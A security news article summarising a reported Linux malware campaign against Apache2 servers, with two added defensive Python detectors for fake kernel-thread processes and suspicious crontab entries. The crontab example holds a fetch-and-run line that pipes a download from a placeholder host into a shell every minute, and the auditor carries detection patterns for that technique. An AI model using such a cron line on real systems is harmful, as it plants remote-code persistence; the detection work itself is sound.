New Sophisticated Linux Malware Exploiting Apache2 Web Servers


Exploiting Apache2 web servers often involves targeting vulnerabilities such as remote code execution (RCE) and path traversal flaws.

Since Apache is used widely, these exploits pose a significant risk to many organizations that fail to implement timely updates and security measures.


Elastic researchers recently identified a new sophisticated Linux malware that was found exploiting Apache2 web servers.

This campaign was uncovered in March 2024 and was found targeting vulnerable servers through “Apache2” web server exploitation.

Linux Malware Exploiting Apache2 Web Servers

The attackers deployed a complex arsenal including “KAIJI” (for DDoS attacks), “RUDEDEVIL” (a cryptocurrency miner), and “custom malware.”

They established persistence using “GSOCKET,” a tool for encrypted communication.


To evade detection, this tool was disguised as a “kernel process.” The campaign used C2 channels, Telegram bots, and cron jobs for remote operations.

A potential Bitcoin/XMR mining scheme involving “gambling APIs” suggested “money laundering” activities.

The attackers employed several Linux-specific techniques, including:

  • Manipulating “SELinux policies.”
  • Using bind mounts for obfuscation.
  • Exploiting CVE-2021-4034 (“pwnkit”) for privilege escalation.

They used “pspy64” for system reconnaissance and attempted to deploy custom binaries (‘apache2’ and ‘apache2v86’) with “XOR-encoded” strings, though these faced execution issues.

The malware’s sophistication was evident in its use of multiple persistence mechanisms like “Systemd services,” “SysVinit scripts,” and “bash profile modifications.”

Throughout the campaign, the attackers demonstrated advanced knowledge of Linux systems by continuously adapting their malware and tactics to avoid detection while maximizing system resource exploitation for “cryptocurrency mining” and “DDoS” operations.

Threat actors began their operation with reconnaissance using tools like “whatserver.sh” to gather server information like “FQDNs” from “SSL certificates” and “system details.”

After failing to escalate privileges to root, they established persistence as the “www-data” user, using ‘GSOCKET’ to hold an “SSL connection” while disguised as a “kernel process” named “[mm_percpu_wq]”.
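A process disguised as a kernel thread can be told apart from a real one by how the kernel exposes it. Genuine kernel threads are children of kthreadd (pid 2), have an empty /proc/&lt;pid&gt;/cmdline and no /proc/&lt;pid&gt;/exe target; `ps` only prints the brackets because the cmdline is empty. A user-space process carrying the brackets inside its own argv[0], or a supposed kthreadd child that has an executable image, is therefore wearing a costume. The following detector is an added example written for this article, not code from Elastic’s report or from the malware; the sample records and the executable path in them are constructed.

```python
"""Flag user-space processes that impersonate kernel threads (added example)."""
import os
import re
from dataclasses import dataclass
from typing import List

# argv[0] written to look like "[name]", the way ps renders real kernel threads
BRACKETED = re.compile(r"^\[[^\]]+\]$")


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str            # /proc/<pid>/comm (never contains brackets)
    exe: str             # readlink(/proc/<pid>/exe), "" when there is no image
    cmdline: List[str]   # argv split on NUL; empty for kernel threads


def is_masquerade(p: Proc) -> bool:
    """True when a process record looks like a kernel thread but is not one."""
    if p.pid == 2 or p.ppid == 2:
        # kthreadd and its children never have an executable image or argv
        return p.exe != "" or bool(p.cmdline)
    # anything else that styles its argv[0] as "[name]" is user-space code
    return bool(p.cmdline) and BRACKETED.match(p.cmdline[0]) is not None


def find_masquerades(procs: List[Proc]) -> List[int]:
    """Return the pids of all suspicious records, sorted."""
    return sorted(p.pid for p in procs if is_masquerade(p))


def read_proc() -> List[Proc]:
    """Collect Proc records from a live Linux /proc (Linux only)."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/stat") as f:
                stat = f.read()
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""            # kernel thread, zombie, or no permission
        except OSError:
            continue                # process exited while we were scanning
        # ppid is the 2nd field after the parenthesised comm in /proc/<pid>/stat
        ppid = int(stat.rsplit(")", 1)[1].split()[1])
        procs.append(Proc(pid, ppid, comm, exe, argv))
    return procs


# Constructed sample records (not from a real host); the gs-netcat path is made up.
SAMPLE = [
    Proc(2, 0, "kthreadd", "", []),
    Proc(57, 2, "mm_percpu_wq", "", []),
    Proc(812, 1, "sshd", "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),
    Proc(4242, 1, "mm_percpu_wq", "/var/tmp/.x/gs-netcat", ["[mm_percpu_wq]"]),
]

if __name__ == "__main__":
    for pid in find_masquerades(SAMPLE):
        print("sample: fake kernel thread pid", pid)
    if os.path.isdir("/proc"):
        for pid in find_masquerades(read_proc()):
            print("live: fake kernel thread pid", pid)
```

The live scan is best-effort: /proc/&lt;pid&gt;/exe is unreadable for other users’ processes without root, so run it with enough privilege to read every exe link or the ppid==2 branch loses its second signal.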

They set up a ‘cron job’ to download and execute a script named “ifindyou” every minute.
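A cron entry that runs every minute and pipes a download straight into a shell is a compact persistence primitive, and it is also easy to audit for. The script below is an added example (not part of Elastic’s analysis) that parses both user crontabs and the /etc/crontab and /etc/cron.d format with its extra user column, then scores each entry on download-and-execute patterns, world-writable staging directories, a once-a-minute schedule, and web-server service accounts. The crontab text and the 203.0.113.10 address in it are constructed for the example.

```python
"""Audit crontab text for download-and-execute persistence (added example)."""
import re
from dataclasses import dataclass
from typing import List

DOWNLOAD = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|da)?sh\b")
STAGING_DIR = re.compile(r"(?:^|[\s;&|(])(?:/tmp|/var/tmp|/dev/shm)/")
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


@dataclass
class CronEntry:
    schedule: str
    command: str
    user: str = ""   # only present in the system crontab format
    raw: str = ""


def parse_crontab(text: str, system: bool = False) -> List[CronEntry]:
    """Parse crontab lines; system=True expects the /etc/crontab user column."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue                      # blank, comment, or PATH=... assignment
        nfields = 1 if line.startswith("@") else 5   # @reboot vs. five time fields
        if system:
            nfields += 1                  # user column sits before the command
        parts = line.split(None, nfields)
        if len(parts) <= nfields:
            continue                      # malformed: no command present
        if system:
            schedule, user = " ".join(parts[:nfields - 1]), parts[nfields - 1]
        else:
            schedule, user = " ".join(parts[:nfields]), ""
        entries.append(CronEntry(schedule, parts[nfields], user, raw))
    return entries


def every_minute(schedule: str) -> bool:
    f = schedule.split()
    return len(f) == 5 and f[0] in ("*", "*/1") and all(x == "*" for x in f[1:])


def review(e: CronEntry) -> List[str]:
    """Reasons an entry deserves a look; empty list means nothing notable."""
    strong, weak = [], []
    if DOWNLOAD.search(e.command) and PIPE_TO_SHELL.search(e.command):
        strong.append("downloads and pipes to a shell")
    elif DOWNLOAD.search(e.command):
        weak.append("fetches content from the network")
    if STAGING_DIR.search(e.command):
        strong.append("executes from a world-writable staging directory")
    if every_minute(e.schedule):
        weak.append("runs every minute")
    if e.user in SERVICE_ACCOUNTS:
        weak.append(f"scheduled as service account {e.user}")
    # one strong indicator, or two weak ones together, is enough to report
    return strong + weak if strong or len(weak) >= 2 else []


def audit(text: str, system: bool = False) -> List[dict]:
    findings = []
    for e in parse_crontab(text, system):
        reasons = review(e)
        if reasons:
            findings.append({"user": e.user, "schedule": e.schedule,
                             "command": e.command, "reasons": reasons})
    return findings


# Constructed /etc/crontab-style sample; the host and URL are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
PATH=/usr/local/bin:/usr/bin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * www-data curl -s http://203.0.113.10/ifindyou | sh > /dev/null 2>&1
@reboot         root    /usr/local/bin/backup --quiet
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB, system=True):
        print(f"[{f['user'] or '-'}] {f['schedule']} {f['command']}")
        for r in f["reasons"]:
            print("   -", r)
```

On a real host, feed it `crontab -l -u <user>` output with `system=False` and the contents of /etc/crontab and /etc/cron.d/* with `system=True`; the scoring deliberately ignores a lone once-a-minute schedule, since monitoring jobs legitimately use it.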

This script deployed “XMRIG” connecting to the unmineable[.]com pool to mine Bitcoin for the wallet address “1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz.”

Wallet address (Source – Elastic)

The malware used the infected machine’s hostname as an identifier in the mining process.

Besides this, the attackers also implemented a “Python script” that interacted with an “online gambling game’s demo version.”

This script included functions for “user authentication” (‘obteneruid’), “data transmission” (‘enviardatos’), “simulating betting” (‘hacerjugada’), and “handling bonus rounds” (‘completarbono’).

It used “HTTP POST” and “GET” requests to communicate with a remote server at gcp.pagaelrescate[.]com, automating the gambling process while incorporating delays to mimic human behavior.

The script’s use of a demo environment suggests it was likely being used for testing or refining their approach, possibly in preparation for more advanced attacks on live gambling platforms.
